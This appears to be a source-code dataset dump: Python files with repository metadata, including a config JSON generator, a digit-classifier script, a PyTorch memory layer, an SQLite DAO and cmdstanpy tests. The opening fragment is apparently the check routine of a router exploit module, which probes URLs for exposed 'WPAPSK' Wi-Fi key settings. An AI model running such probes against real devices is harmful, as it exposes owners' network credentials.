check1 = http_request(method="GET", url=url1)
if check1 is not None and check1.status_code == 200 and "WPAPSK" in check1.text:
return True
check2 = http_request(method="GET", url=url2)
if check2 is not None and check2.status_code == 200 and "ddns" in check2.text:
return True
return False
| 2,025 | 0 | 53 |
4f76e389f54e3aa0502a094ec4b3d7cc71a662bd | 3,101 | py | Python | ipbm-old/controller/util/python/generate_header_json_from_file.py | jijinfanhua/IPSA-ipbm | c82dc003bf9c68ba029814d7539f502fd29e1326 | [
"Apache-2.0"
] | null | null | null | ipbm-old/controller/util/python/generate_header_json_from_file.py | jijinfanhua/IPSA-ipbm | c82dc003bf9c68ba029814d7539f502fd29e1326 | [
"Apache-2.0"
] | null | null | null | ipbm-old/controller/util/python/generate_header_json_from_file.py | jijinfanhua/IPSA-ipbm | c82dc003bf9c68ba029814d7539f502fd29e1326 | [
"Apache-2.0"
] | null | null | null | import json
from basic_class import *
# fp = open("../config/header_pure.txt", "r")
fp = open("../../config/header_pure.txt", "r")
header_list = []
while True:
line = fp.readline()
# print(line)
if line == "*":
break
elif line == "":
continue
else:
l = line.split()
if line[0] == 'h':
header = Header(l[1], int(l[2]), int(l[3]))
header_list.append(header)
elif line[0] == 'f':
field = Field(l[1], int(l[2]), int(l[3]))
header_list[-1].addField(field)
elif line[0] == 'n':
if int(l[2]) == 0:
continue
header_list[-1].next_header_type_internal_offset = int(l[1])
header_list[-1].next_header_type_length = int(l[2])
elif line[0] == 'm':
if l[2] == "0":
continue
next_header = NextHeader(l[1], l[2])
header_list[-1].addNextHeader(next_header)
json_data = {}
for header in header_list:
fields = header.fields
next_headers = header.next_headers
field_dict = {}
next_header_dict = {}
for field in fields:
field_dict[field.field_name] = {"field_name": field.field_name,
"field_length": field.field_length,
"field_internal_offset": field.field_internal_offset}
for next_header in next_headers:
next_header_dict[next_header.header_tag] = {"header_tag": next_header.header_tag,
"header_name": next_header.header_name}
json_data[header.header_name] = {"header_name": header.header_name,
"header_length": header.header_length,
"next_header_type_internal_offset": header.next_header_type_internal_offset,
"next_header_type_length": header.next_header_type_length,
"field_num": header.field_num,
"fields": field_dict,
"next_headers": next_header_dict}
filename = "../../config/header.json"
with open(filename, 'w') as file_obj:
json.dump(json_data, file_obj, indent=3)
# json_string = json.dumps(json_data, indent=3)
# print(json_string)
# print('Header: {}'.format(header.header_name))
# print('\theader length: {}'.format(header.header_length))
# print('\tfield num: {}'.format(header.field_num))
# if(header.next_header_type_length != 0):
# print('\tnext_header_type_internal_offset: {}'.format(header.next_header_type_internal_offset))
# print('\tnext_header_type_length: {}'.format(header.next_header_type_length))
# print('\tFields:')
# for field in header.fields:
# print('\t\t{} {} {}'.format(field.field_name, field.field_length, field.field_internal_offset))
# print('\tNext Headers:')
# for next_header in header.next_headers:
# print('\t\t{} {}'.format(next_header.header_tag, next_header.header_name))
| 41.346667 | 113 | 0.570461 | import json
from basic_class import *
# fp = open("../config/header_pure.txt", "r")
fp = open("../../config/header_pure.txt", "r")
header_list = []
while True:
line = fp.readline()
# print(line)
if line == "*":
break
elif line == "":
continue
else:
l = line.split()
if line[0] == 'h':
header = Header(l[1], int(l[2]), int(l[3]))
header_list.append(header)
elif line[0] == 'f':
field = Field(l[1], int(l[2]), int(l[3]))
header_list[-1].addField(field)
elif line[0] == 'n':
if int(l[2]) == 0:
continue
header_list[-1].next_header_type_internal_offset = int(l[1])
header_list[-1].next_header_type_length = int(l[2])
elif line[0] == 'm':
if l[2] == "0":
continue
next_header = NextHeader(l[1], l[2])
header_list[-1].addNextHeader(next_header)
json_data = {}
for header in header_list:
fields = header.fields
next_headers = header.next_headers
field_dict = {}
next_header_dict = {}
for field in fields:
field_dict[field.field_name] = {"field_name": field.field_name,
"field_length": field.field_length,
"field_internal_offset": field.field_internal_offset}
for next_header in next_headers:
next_header_dict[next_header.header_tag] = {"header_tag": next_header.header_tag,
"header_name": next_header.header_name}
json_data[header.header_name] = {"header_name": header.header_name,
"header_length": header.header_length,
"next_header_type_internal_offset": header.next_header_type_internal_offset,
"next_header_type_length": header.next_header_type_length,
"field_num": header.field_num,
"fields": field_dict,
"next_headers": next_header_dict}
filename = "../../config/header.json"
with open(filename, 'w') as file_obj:
json.dump(json_data, file_obj, indent=3)
# json_string = json.dumps(json_data, indent=3)
# print(json_string)
# print('Header: {}'.format(header.header_name))
# print('\theader length: {}'.format(header.header_length))
# print('\tfield num: {}'.format(header.field_num))
# if(header.next_header_type_length != 0):
# print('\tnext_header_type_internal_offset: {}'.format(header.next_header_type_internal_offset))
# print('\tnext_header_type_length: {}'.format(header.next_header_type_length))
# print('\tFields:')
# for field in header.fields:
# print('\t\t{} {} {}'.format(field.field_name, field.field_length, field.field_internal_offset))
# print('\tNext Headers:')
# for next_header in header.next_headers:
# print('\t\t{} {}'.format(next_header.header_tag, next_header.header_name))
| 0 | 0 | 0 |
d1b6bda899be2b2c1c9f15895d3f6979a97d89d0 | 649 | py | Python | NN utilizando PIXELES/rendimiento_de_theta_de_pixeles.py | DussanFreire/NN-used-to-recognize-numbers-and-basic-operations | e023e1bd698b8acc2b01b796dd5a8036946f617f | [
"MIT"
] | null | null | null | NN utilizando PIXELES/rendimiento_de_theta_de_pixeles.py | DussanFreire/NN-used-to-recognize-numbers-and-basic-operations | e023e1bd698b8acc2b01b796dd5a8036946f617f | [
"MIT"
] | null | null | null | NN utilizando PIXELES/rendimiento_de_theta_de_pixeles.py | DussanFreire/NN-used-to-recognize-numbers-and-basic-operations | e023e1bd698b8acc2b01b796dd5a8036946f617f | [
"MIT"
] | null | null | null | from RedNeuronal import RedNeuronal
import h5py
# direccion alvaro
# data = h5py.File(r"C:\Users\Lenovo\Downloads\modelado\practica_3\digitos.h5", "r")
# direccion dussan
data = h5py.File(r"C:\Users\Dussan\Desktop\digitos_con_signos.h5", "r")
X_train = data["X_train"][:]
y_train = data["y_train"][:]
X_test = data["X_test"][:]
y_test = data["y_test"][:]
r= RedNeuronal()
#Por cada valor
r.capa1 = 784
r.capa2 = 256
r.capa3 = 64
r.capa4 = 12
r.inicializar_parametros()
r.fit(X_train, y_train)
r.cargar("theta_digitos.h5")
# mostrar rrendimiento en consola
r.obtener_presicion(X_test, y_test)
r.obtener_matriz_confusion_por_valor(X_test, y_test) | 24.037037 | 84 | 0.74114 | from RedNeuronal import RedNeuronal
import h5py
# direccion alvaro
# data = h5py.File(r"C:\Users\Lenovo\Downloads\modelado\practica_3\digitos.h5", "r")
# direccion dussan
data = h5py.File(r"C:\Users\Dussan\Desktop\digitos_con_signos.h5", "r")
X_train = data["X_train"][:]
y_train = data["y_train"][:]
X_test = data["X_test"][:]
y_test = data["y_test"][:]
r= RedNeuronal()
#Por cada valor
r.capa1 = 784
r.capa2 = 256
r.capa3 = 64
r.capa4 = 12
r.inicializar_parametros()
r.fit(X_train, y_train)
r.cargar("theta_digitos.h5")
# mostrar rrendimiento en consola
r.obtener_presicion(X_test, y_test)
r.obtener_matriz_confusion_por_valor(X_test, y_test) | 0 | 0 | 0 |
0f223ad90181adf72be759f9ee7f7d47f3d7ed0c | 2,594 | py | Python | Utility/Torch/Models/Supertransformer/Layers/DeepMemory.py | smithblack-0/Utility | 875ab69fffad1412174d9d0a1de70edc1fd64152 | [
"MIT"
] | null | null | null | Utility/Torch/Models/Supertransformer/Layers/DeepMemory.py | smithblack-0/Utility | 875ab69fffad1412174d9d0a1de70edc1fd64152 | [
"MIT"
] | null | null | null | Utility/Torch/Models/Supertransformer/Layers/DeepMemory.py | smithblack-0/Utility | 875ab69fffad1412174d9d0a1de70edc1fd64152 | [
"MIT"
] | null | null | null | """
A class for the deep memory process. Deep memory is a flavor spawned by the techniques
displayed in Memorizing Transformers (https://arxiv.org/abs/2203.08913). However,
rather thqn saving each instance to an external memory bank, instead we search a
space of differential memory, and only train the topk instances
"""
from typing import Optional
import torch
from torch import nn
from Utility.Torch.Learnables import Layers
class DeepMemoryTransformer(nn.Module):
"""
Deep Memory is designed to allow efficient computation and collection
of facts gathered from a variety of sources with minimal overhead.
The input to the layer is, as is standard, the query. The key and
value, however, are generated internally from a stored bank of
parameters which are intended to change rapidly
TopK is used to limit the regions which may be active at a particular
time, providing some degree of binning
"""
def __init__(self,
query_width: int,
output_width: int,
memory_length: int,
heads: int,
topk: int,
):
"""
:param query_width: How wide the query embedding width is
:param output_width: How wide the output width will be
:param memory_length: How long the memory will be.
:param heads: The number of heads to make.
:param topk: The number of entities to keep per head.
"""
assert query_width % heads == 0
super().__init__()
head_width = query_width//heads
memory = torch.zeros([heads, memory_length, head_width], requires_grad=True)
memory = torch.nn.init.kaiming_uniform(memory, requires_grad=True)
self.memory = nn.Parameter(memory, requires_grad=True)
self.topk = topk
self.query_projector([query_width], [heads, head_width])
self.key_projector([head_width], [head_width], heads)
self.final_projector([heads, head_width], [output_width])
| 35.054054 | 86 | 0.660756 | """
A class for the deep memory process. Deep memory is a flavor spawned by the techniques
displayed in Memorizing Transformers (https://arxiv.org/abs/2203.08913). However,
rather thqn saving each instance to an external memory bank, instead we search a
space of differential memory, and only train the topk instances
"""
from typing import Optional
import torch
from torch import nn
from Utility.Torch.Learnables import Layers
class DeepMemoryTransformer(nn.Module):
"""
Deep Memory is designed to allow efficient computation and collection
of facts gathered from a variety of sources with minimal overhead.
The input to the layer is, as is standard, the query. The key and
value, however, are generated internally from a stored bank of
parameters which are intended to change rapidly
TopK is used to limit the regions which may be active at a particular
time, providing some degree of binning
"""
def __init__(self,
query_width: int,
output_width: int,
memory_length: int,
heads: int,
topk: int,
):
"""
:param query_width: How wide the query embedding width is
:param output_width: How wide the output width will be
:param memory_length: How long the memory will be.
:param heads: The number of heads to make.
:param topk: The number of entities to keep per head.
"""
assert query_width % heads == 0
super().__init__()
head_width = query_width//heads
memory = torch.zeros([heads, memory_length, head_width], requires_grad=True)
memory = torch.nn.init.kaiming_uniform(memory, requires_grad=True)
self.memory = nn.Parameter(memory, requires_grad=True)
self.topk = topk
self.query_projector([query_width], [heads, head_width])
self.key_projector([head_width], [head_width], heads)
self.final_projector([heads, head_width], [output_width])
def forward(self, tensor: torch.Tensor):
query = self.query_projector(tensor).transpose(-2, -3)
keys = self.key_projector(self.memory).unsqueeze(-1)
score = torch.matmul(query, keys).squeeze(-1)
top, topindices = score.topk(self.topk, dim=-2)
score = torch.sigmoid(top) # (..., head, items, memitems)
values = self.memory[..., topindices, :] # (..., head, memitems, encodings)
output = torch.matmul(score, values)
output = self.final_projector(output.transpose(-2, -3))
return output
| 537 | 0 | 26 |
6fafe0b4501bda51210d04a842b5f2ca1523ff1d | 9,781 | py | Python | litedao/__init__.py | pyrustic/litedao | 9d34879996aa5248db734491444976225380b362 | [
"MIT"
] | null | null | null | litedao/__init__.py | pyrustic/litedao | 9d34879996aa5248db734491444976225380b362 | [
"MIT"
] | null | null | null | litedao/__init__.py | pyrustic/litedao | 9d34879996aa5248db734491444976225380b362 | [
"MIT"
] | null | null | null | import sqlite3 as sqlite
import os.path
import atexit
import threading
class Litedao:
"""
It's recommended to use Dao by composition. Meaning: don't subclass it.
DAO: Data Access Object (this one is built to work with SQLite).
You give an SQL request with some params or not, it spills out the result nicely !
You can even get the list of tables or columns.
"""
def __init__(self, path, init_script=None, raise_exception=True,
raise_warning=True, connection_kwargs=None):
"""
- path: absolute path to database file
- init_script: a path to a file, a file-like object or a string of sql code
Example_a: "CREATE TABLE my_table(id INTEGER NOT NULL PRIMARY KEY);"
Example_b: "/path/to/script.sql"
- raise_exception: By default, True, so exceptions (sqlite.Error) will be raised
- raise_warning: By default, True, so exceptions (sqlite.Warning) will be raised
- connection_kwargs: connections arguments used while calling the
method "sqlite.connect()"
"""
self._path = os.path.normpath(path)
self._init_script = init_script
self._raise_exception = raise_exception
self._raise_warning = raise_warning
self._lock = threading.Lock()
use_init_script = False
self._con = None
self._is_new = False
if not os.path.isfile(path):
self._is_new = True
use_init_script = True
try:
connection_kwargs = {} if connection_kwargs is None else connection_kwargs
if "check_same_thread" in connection_kwargs:
del connection_kwargs["check_same_thread"]
self._con = sqlite.connect(path,
check_same_thread=False,
**connection_kwargs)
except sqlite.Error as e:
raise e
finally:
atexit.register(self.close)
if use_init_script and init_script:
self.script(init_script)
# ====================================
# PROPERTIES
# ====================================
@property
@property
def con(self):
"""
Connection object
"""
return self._con
@property
@property
def is_new(self):
"""
Returns True if the database has just been created, otherwise returns False
"""
return self._is_new
# ====================================
# PUBLIC METHODS
# ====================================
def test(self):
"""
Returns True if this is a legal database, otherwise returns False
"""
cache = self._raise_exception
self._raise_exception = True
legal = True
try:
self.tables()
except sqlite.Error as e:
legal = False
except sqlite.Warning as e:
legal = False
self._raise_exception = cache
return legal
def edit(self, sql, param=None):
"""
Use this method to edit your database.
Formally: Data Definition Language (DDL) and Data Manipulation Language (DML).
It returns True or False or raises sqlite.Error, sqlite.Warning
"""
with self._lock:
param = () if param is None else param
result = True
cur = None
try:
cur = self._con.cursor()
cur.execute(sql, param)
self._con.commit()
except sqlite.Error as e:
result = False
if self._raise_exception:
raise
except sqlite.Warning as e:
result = False
if self._raise_warning:
raise
finally:
if cur:
cur.close()
return result
def query(self, sql, param=None):
"""
Use this method to query your database.
Formally: Data Query Language (DQL)
It returns a tuple: (data, description).
Data is a list with data from ur query.
Description is a list with the name of columns related to data
Example: ( [1, "Jack", 50], ["id", "name", "age"] )
This method can raise sqlite.Error, sqlite.Warning
"""
with self._lock:
param = () if param is None else param
description = []
data = []
cur = None
try:
cur = self._con.cursor()
cur.execute(sql, param)
data = cur.fetchall()
description = cur.description
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
finally:
if cur:
cur.close()
return [x[0] for x in description], data
def script(self, script):
"""
Executes the script as an sql-script. Meaning: there are multiple lines of sql.
This method returns nothing but could raise sqlite.Error, sqlite.Warning.
script could be a path to a file, a file-like object or just a string.
"""
with self._lock:
cur = None
try:
script = self._stringify_script(script)
cur = self._con.cursor()
cur.executescript(script)
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
finally:
if cur:
cur.close()
def export(self):
"""
export the database: it returns a string of sql code.
This method can raise sqlite.Error, sqlite.Warning
"""
with self._lock:
result = ""
try:
"\n".join(self._con.iterdump())
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
return result
def tables(self):
"""
Returns the list of tables names.
Example: ["table_1", "table_2"]
This method can raise sqlite.Error, sqlite.Warning
"""
with self._lock:
data = []
cur = None
try:
cur = self._con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")
data = cur.fetchall()
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
finally:
if cur:
cur.close()
return [item[0] for item in data]
def columns(self, table):
"""
Returns the list of columns names of the given table name
A column is like:
(int_id, str_column_name, str_column_datatype, int_boolean_nullability,
default_value, int_primary_key)
Example:
[(0, "id", "INTEGER", 1, None, 1),
(1, "name", "TEXT", 0, None, 0),
(2, "age", "INTEGER", 1, None, 0)]
This method can raise sqlite.Error, sqlite.Warning
"""
with self._lock:
data = []
cur = None
try:
cur = self._con.cursor()
cur.execute("pragma table_info('{}')".format(table))
data = cur.fetchall()
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
finally:
if cur:
cur.close()
return data
def close(self):
"""
Well, it closes the connection
"""
with self._lock:
if self._con:
try:
self._con.close()
except Exception:
pass
self._con = None
atexit.unregister(self.close)
def _stringify_script(self, script):
""" This method will:
- try to read the script: if the script is a file-like object,
the content (string) will be returned
- try to open the script: if the script is a path to a file,
the content (string) will be returned
- if the script is already a string, it will be returned as it,
- the script will be returned as it if failed to read/open
"""
# if script is a file-like object
try:
script = script.read()
except Exception as e:
pass
else:
return script
# if script is a path to a file
try:
with open(script, "r") as file:
script = file.read()
except Exception as e:
pass
else:
return script
return script
| 32.712375 | 109 | 0.51048 | import sqlite3 as sqlite
import os.path
import atexit
import threading
class Litedao:
"""
It's recommended to use Dao by composition. Meaning: don't subclass it.
DAO: Data Access Object (this one is built to work with SQLite).
You give an SQL request with some params or not, it spills out the result nicely !
You can even get the list of tables or columns.
"""
def __init__(self, path, init_script=None, raise_exception=True,
raise_warning=True, connection_kwargs=None):
"""
- path: absolute path to database file
- init_script: a path to a file, a file-like object or a string of sql code
Example_a: "CREATE TABLE my_table(id INTEGER NOT NULL PRIMARY KEY);"
Example_b: "/path/to/script.sql"
- raise_exception: By default, True, so exceptions (sqlite.Error) will be raised
- raise_warning: By default, True, so exceptions (sqlite.Warning) will be raised
- connection_kwargs: connections arguments used while calling the
method "sqlite.connect()"
"""
self._path = os.path.normpath(path)
self._init_script = init_script
self._raise_exception = raise_exception
self._raise_warning = raise_warning
self._lock = threading.Lock()
use_init_script = False
self._con = None
self._is_new = False
if not os.path.isfile(path):
self._is_new = True
use_init_script = True
try:
connection_kwargs = {} if connection_kwargs is None else connection_kwargs
if "check_same_thread" in connection_kwargs:
del connection_kwargs["check_same_thread"]
self._con = sqlite.connect(path,
check_same_thread=False,
**connection_kwargs)
except sqlite.Error as e:
raise e
finally:
atexit.register(self.close)
if use_init_script and init_script:
self.script(init_script)
# ====================================
# PROPERTIES
# ====================================
@property
def path(self):
return self._path
@property
def con(self):
"""
Connection object
"""
return self._con
@property
def init_script(self):
return self._init_script
@property
def is_new(self):
"""
Returns True if the database has just been created, otherwise returns False
"""
return self._is_new
# ====================================
# PUBLIC METHODS
# ====================================
def test(self):
"""
Returns True if this is a legal database, otherwise returns False
"""
cache = self._raise_exception
self._raise_exception = True
legal = True
try:
self.tables()
except sqlite.Error as e:
legal = False
except sqlite.Warning as e:
legal = False
self._raise_exception = cache
return legal
def edit(self, sql, param=None):
"""
Use this method to edit your database.
Formally: Data Definition Language (DDL) and Data Manipulation Language (DML).
It returns True or False or raises sqlite.Error, sqlite.Warning
"""
with self._lock:
param = () if param is None else param
result = True
cur = None
try:
cur = self._con.cursor()
cur.execute(sql, param)
self._con.commit()
except sqlite.Error as e:
result = False
if self._raise_exception:
raise
except sqlite.Warning as e:
result = False
if self._raise_warning:
raise
finally:
if cur:
cur.close()
return result
def query(self, sql, param=None):
"""
Use this method to query your database.
Formally: Data Query Language (DQL)
It returns a tuple: (data, description).
Data is a list with data from ur query.
Description is a list with the name of columns related to data
Example: ( [1, "Jack", 50], ["id", "name", "age"] )
This method can raise sqlite.Error, sqlite.Warning
"""
with self._lock:
param = () if param is None else param
description = []
data = []
cur = None
try:
cur = self._con.cursor()
cur.execute(sql, param)
data = cur.fetchall()
description = cur.description
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
finally:
if cur:
cur.close()
return [x[0] for x in description], data
def script(self, script):
"""
Executes the script as an sql-script. Meaning: there are multiple lines of sql.
This method returns nothing but could raise sqlite.Error, sqlite.Warning.
script could be a path to a file, a file-like object or just a string.
"""
with self._lock:
cur = None
try:
script = self._stringify_script(script)
cur = self._con.cursor()
cur.executescript(script)
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
finally:
if cur:
cur.close()
def export(self):
"""
export the database: it returns a string of sql code.
This method can raise sqlite.Error, sqlite.Warning
"""
with self._lock:
result = ""
try:
"\n".join(self._con.iterdump())
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
return result
def tables(self):
"""
Returns the list of tables names.
Example: ["table_1", "table_2"]
This method can raise sqlite.Error, sqlite.Warning
"""
with self._lock:
data = []
cur = None
try:
cur = self._con.cursor()
cur.execute("SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")
data = cur.fetchall()
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
finally:
if cur:
cur.close()
return [item[0] for item in data]
def columns(self, table):
"""
Returns the list of columns names of the given table name
A column is like:
(int_id, str_column_name, str_column_datatype, int_boolean_nullability,
default_value, int_primary_key)
Example:
[(0, "id", "INTEGER", 1, None, 1),
(1, "name", "TEXT", 0, None, 0),
(2, "age", "INTEGER", 1, None, 0)]
This method can raise sqlite.Error, sqlite.Warning
"""
with self._lock:
data = []
cur = None
try:
cur = self._con.cursor()
cur.execute("pragma table_info('{}')".format(table))
data = cur.fetchall()
except sqlite.Error as e:
if self._raise_exception:
raise
except sqlite.Warning as e:
if self._raise_warning:
raise
finally:
if cur:
cur.close()
return data
def close(self):
"""
Well, it closes the connection
"""
with self._lock:
if self._con:
try:
self._con.close()
except Exception:
pass
self._con = None
atexit.unregister(self.close)
def _stringify_script(self, script):
""" This method will:
- try to read the script: if the script is a file-like object,
the content (string) will be returned
- try to open the script: if the script is a path to a file,
the content (string) will be returned
- if the script is already a string, it will be returned as it,
- the script will be returned as it if failed to read/open
"""
# if script is a file-like object
try:
script = script.read()
except Exception as e:
pass
else:
return script
# if script is a path to a file
try:
with open(script, "r") as file:
script = file.read()
except Exception as e:
pass
else:
return script
return script
class Error(Exception):
def __init__(self, *args, **kwargs):
self.message = args[0] if args else ""
super().__init__(self.message)
def __str__(self):
return self.message | 180 | 2 | 128 |
7563d761b6b45d37317527e311c9b9997d563f4b | 760 | py | Python | tools/init_paths.py | ys7yoo/HRNet | 264414c06d64aa0b4327930b8f612a50fc6450cd | [
"MIT"
] | null | null | null | tools/init_paths.py | ys7yoo/HRNet | 264414c06d64aa0b4327930b8f612a50fc6450cd | [
"MIT"
] | 3 | 2019-10-27T13:19:32.000Z | 2019-10-28T10:05:16.000Z | tools/init_paths.py | ys7yoo/HRNet | 264414c06d64aa0b4327930b8f612a50fc6450cd | [
"MIT"
] | null | null | null | ## MODIFIED FROM _init_paths.py
import os
import sys
PATH_CURRENT = os.path.abspath(os.path.dirname(__file__))
# print(PATH_CURRENT)
# get parent dir: https://stackoverflow.com/questions/2860153/how-do-i-get-the-parent-directory-in-python
from pathlib import Path
PATH_PARENT = Path(PATH_CURRENT).parent
#PATH_PARENT = os.path.abspath(os.path.dirname(__file__)+os.path.sep+os.pardir) # THIS DOESN'T WORK IN SOME ENVIRONMENTS
#print(PATH_PARENT)
PATH_LIB = os.path.join(PATH_PARENT, 'lib')
#print(PATH_LIB)
add_path(PATH_LIB)
PATH_MM = os.path.join(PATH_PARENT, 'lib/poseeval/py-motmetrics')
add_path(PATH_MM)
#print(sys.path)
| 26.206897 | 120 | 0.746053 | ## MODIFIED FROM _init_paths.py
import os
import sys
def add_path(path):
if path not in sys.path:
# print('adding path {}'.format(path))
sys.path.append(path)
PATH_CURRENT = os.path.abspath(os.path.dirname(__file__))
# print(PATH_CURRENT)
# get parent dir: https://stackoverflow.com/questions/2860153/how-do-i-get-the-parent-directory-in-python
from pathlib import Path
PATH_PARENT = Path(PATH_CURRENT).parent
#PATH_PARENT = os.path.abspath(os.path.dirname(__file__)+os.path.sep+os.pardir) # THIS DOESN'T WORK IN SOME ENVIRONMENTS
#print(PATH_PARENT)
PATH_LIB = os.path.join(PATH_PARENT, 'lib')
#print(PATH_LIB)
add_path(PATH_LIB)
PATH_MM = os.path.join(PATH_PARENT, 'lib/poseeval/py-motmetrics')
add_path(PATH_MM)
#print(sys.path)
| 104 | 0 | 23 |
dcbe0f04a0fe2c456ffd41f8434bc8e697bca643 | 12,349 | py | Python | test/test_cmds.py | codeLovingYogi/cmdstanpy | b9d418c98535fb5571ae70058c73f75eac3637f7 | [
"BSD-3-Clause"
] | null | null | null | test/test_cmds.py | codeLovingYogi/cmdstanpy | b9d418c98535fb5571ae70058c73f75eac3637f7 | [
"BSD-3-Clause"
] | null | null | null | test/test_cmds.py | codeLovingYogi/cmdstanpy | b9d418c98535fb5571ae70058c73f75eac3637f7 | [
"BSD-3-Clause"
] | null | null | null | import io
import os
import os.path
import sys
import unittest
from cmdstanpy import TMPDIR
from cmdstanpy.lib import Model, SamplerArgs, RunSet
from cmdstanpy.cmds import compile_model, sample, summary, diagnose
from cmdstanpy.cmds import get_drawset, save_csvfiles
datafiles_path = os.path.join('test', 'data')
# TODO: test compile with existing exe - timestamp on exe unchanged
# TODO: test overwrite with existing exe - timestamp on exe updated
if __name__ == '__main__':
unittest.main()
| 39.453674 | 80 | 0.616244 | import io
import os
import os.path
import sys
import unittest
from cmdstanpy import TMPDIR
from cmdstanpy.lib import Model, SamplerArgs, RunSet
from cmdstanpy.cmds import compile_model, sample, summary, diagnose
from cmdstanpy.cmds import get_drawset, save_csvfiles
datafiles_path = os.path.join('test', 'data')
class CompileTest(unittest.TestCase):
def test_good(self):
stan = os.path.join(datafiles_path, 'bernoulli.stan')
exe = os.path.join(datafiles_path, 'bernoulli')
if os.path.exists(exe):
os.remove(exe)
model = compile_model(stan)
self.assertEqual(stan, model.stan_file)
self.assertTrue(model.exe_file.endswith(exe))
def test_include(self):
stan = os.path.join(datafiles_path, 'bernoulli_include.stan')
exe = os.path.join(datafiles_path, 'bernoulli_include')
here = os.path.dirname(os.path.abspath(__file__))
datafiles_abspath = os.path.join(here, 'data')
include_paths = [datafiles_abspath]
if os.path.exists(exe):
os.remove(exe)
model = compile_model(stan, include_paths=include_paths)
self.assertEqual(stan, model.stan_file)
self.assertTrue(model.exe_file.endswith(exe))
def test_bad(self):
stan = os.path.join(TMPDIR, 'bbad.stan')
with self.assertRaises(Exception):
model = compile_model(stan)
# TODO: test compile with existing exe - timestamp on exe unchanged
# TODO: test overwrite with existing exe - timestamp on exe updated
class SampleTest(unittest.TestCase):
def test_bernoulli_1(self):
stan = os.path.join(datafiles_path, 'bernoulli.stan')
exe = os.path.join(datafiles_path, 'bernoulli')
if not os.path.exists(exe):
compile_model(stan)
model = Model(stan, exe_file=exe)
jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
output = os.path.join(datafiles_path, 'test1-bernoulli-output')
post_sample = sample(
model,
chains=4,
cores=2,
seed=12345,
sampling_iters=100,
data=jdata,
csv_output_file=output,
max_treedepth=11,
adapt_delta=0.95,
)
for i in range(post_sample.chains):
csv_file = post_sample.csv_files[i]
txt_file = ''.join([os.path.splitext(csv_file)[0], '.txt'])
self.assertTrue(os.path.exists(csv_file))
self.assertTrue(os.path.exists(txt_file))
self.assertEqual(post_sample.chains, 4)
self.assertEqual(post_sample.draws, 100)
column_names = [
'lp__',
'accept_stat__',
'stepsize__',
'treedepth__',
'n_leapfrog__',
'divergent__',
'energy__',
'theta',
]
self.assertEqual(post_sample.column_names, tuple(column_names))
post_sample.assemble_sample()
self.assertEqual(post_sample.sample.shape, (100, 4, len(column_names)))
self.assertEqual(post_sample.metric_type, 'diag_e')
self.assertEqual(post_sample.stepsize.shape, (4,))
self.assertEqual(post_sample.metric.shape, (4, 1))
def test_bernoulli_2(self):
# tempfile for outputs
stan = os.path.join(datafiles_path, 'bernoulli.stan')
exe = os.path.join(datafiles_path, 'bernoulli')
if not os.path.exists(exe):
compile_model(stan)
model = Model(stan, exe_file=exe)
jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
post_sample = sample(
model,
chains=4,
cores=2,
seed=12345,
sampling_iters=100,
data=jdata,
max_treedepth=11,
adapt_delta=0.95,
)
for i in range(post_sample.chains):
csv_file = post_sample.csv_files[i]
txt_file = ''.join([os.path.splitext(csv_file)[0], '.txt'])
self.assertTrue(os.path.exists(csv_file))
self.assertTrue(os.path.exists(txt_file))
def test_bernoulli_rdata(self):
rdata = os.path.join(datafiles_path, 'bernoulli.data.R')
stan = os.path.join(datafiles_path, 'bernoulli.stan')
output = os.path.join(TMPDIR, 'test3-bernoulli-output')
model = compile_model(stan)
post_sample = sample(model, data=rdata, csv_output_file=output)
for i in range(post_sample.chains):
csv_file = post_sample.csv_files[i]
txt_file = ''.join([os.path.splitext(csv_file)[0], '.txt'])
self.assertTrue(os.path.exists(csv_file))
self.assertTrue(os.path.exists(txt_file))
def test_bernoulli_data(self):
data_dict = {'N': 10, 'y': [0, 1, 0, 0, 0, 0, 0, 0, 0, 1]}
stan = os.path.join(datafiles_path, 'bernoulli.stan')
output = os.path.join(TMPDIR, 'test3-bernoulli-output')
model = compile_model(stan)
post_sample = sample(model, data=data_dict, csv_output_file=output)
for i in range(post_sample.chains):
csv_file = post_sample.csv_files[i]
txt_file = ''.join([os.path.splitext(csv_file)[0], '.txt'])
self.assertTrue(os.path.exists(csv_file))
self.assertTrue(os.path.exists(txt_file))
def test_missing_input(self):
stan = os.path.join(datafiles_path, 'bernoulli.stan')
output = os.path.join(TMPDIR, 'test4-bernoulli-output')
model = compile_model(stan)
with self.assertRaisesRegex(Exception, 'Error during sampling'):
post_sample = sample(model, csv_output_file=output)
class DrawsetTest(unittest.TestCase):
def test_bernoulli(self):
stan = os.path.join(datafiles_path, 'bernoulli.stan')
exe = os.path.join(datafiles_path, 'bernoulli')
if not os.path.exists(exe):
compile_model(stan)
model = Model(stan, exe_file=exe)
jdata = os.path.join(datafiles_path, 'bernoulli.data.json')
post_sample = sample(
model, chains=4, cores=2, seed=12345, sampling_iters=200, data=jdata
)
post_sample.assemble_sample()
df = get_drawset(post_sample)
self.assertEqual(
df.shape,
(
post_sample.chains * post_sample.draws,
len(post_sample.column_names),
),
)
def test_sample_big(self):
# construct runset using existing sampler output
stan = os.path.join(datafiles_path, 'bernoulli.stan')
exe = os.path.join(datafiles_path, 'bernoulli')
model = Model(exe_file=exe, stan_file=stan)
output = os.path.join(datafiles_path, 'runset-big', 'output_icar_nyc')
args = SamplerArgs(model, chain_ids=[1, 2], output_file=output)
runset = RunSet(chains=2, args=args)
runset.validate_csv_files()
runset.assemble_sample()
sampler_state = [
'lp__',
'accept_stat__',
'stepsize__',
'treedepth__',
